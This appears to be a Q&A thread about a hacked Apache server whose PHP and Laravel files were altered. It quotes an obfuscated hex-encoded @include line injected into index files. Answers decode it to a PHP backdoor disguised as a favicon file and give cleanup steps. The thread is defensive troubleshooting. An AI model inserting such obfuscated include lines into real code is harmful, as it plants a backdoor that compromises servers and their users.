# malware | my php files on apache server is being changed

Tags: php, security, code-injection, malware, virus

I got a wrong issue on my server. For example i got a static html website. used well for a couple days. than links got broken.  i checked ftp and saw index.html changed to index.html.bak and there was a index.php

This strange files have some encrypted code. 
Such as this: index.php https://hastebin.com/xepokigeqe.xml

And this: xml62.php https://hastebin.com/edohitogoc.xml

This case brokes my other php web apps. Some of my laravel apps index files got injected with these lines

```
/*47f70*/

@include "\x2fh\x6fm\x65/\x757\x335\x362\x336\x2f1\x37n\x61p\x6fl\x69p\x69z\x7aa\x2ec\x6fm\x2fa\x73s\x65t\x73/\x69m\x61g\x65s\x2fa\x76a\x74a\x72s\x2ff\x61v\x69c\x6fn\x5f0\x344\x624\x65.\x69c\x6f";

/*47f70*/
```

I don't know how to solve or how to research this thing. If anyone knows about this, please help me. I'll be glad. thnx

Answer (score 3, accepted):

You should remove all files if possible and replace them with a clean version(uncompromised) of your code.

After this, in order to investigate the breach you should:

1. change your ftp password and check your ftp access logs
2. check your webserver log for weird entries(remote php execution)
3. check your mysql log files for weird queries (mysql injection)

the encoded string translates to

```
 /home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico
```

This is most likely some backdoor disguised as a favicon.

Comment: i'll try these. checked favicon file and get a long encrypted another php file.i'm gonna clean all of this junk. thnx

Comment: I had the same problem but did not know where to decode the string. After searching a little I found https://www.unphp.net/ which decoded the string. Just in case if anyone is looking out for the decoder.

Answer (score 1):

Decrypts to 
    @include "/home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico";

The malware is: `http://bebekti.com/script/revslider/favicon_45717f.ico`
It is a php file disguised as an icon file and it decrypts to : https://hastebin.com/racohopene.xml

I would change all of your passwords and make sure it is something secure.

Comment: just cleaned all favicon_* and meanless php files. also injected files. think it worked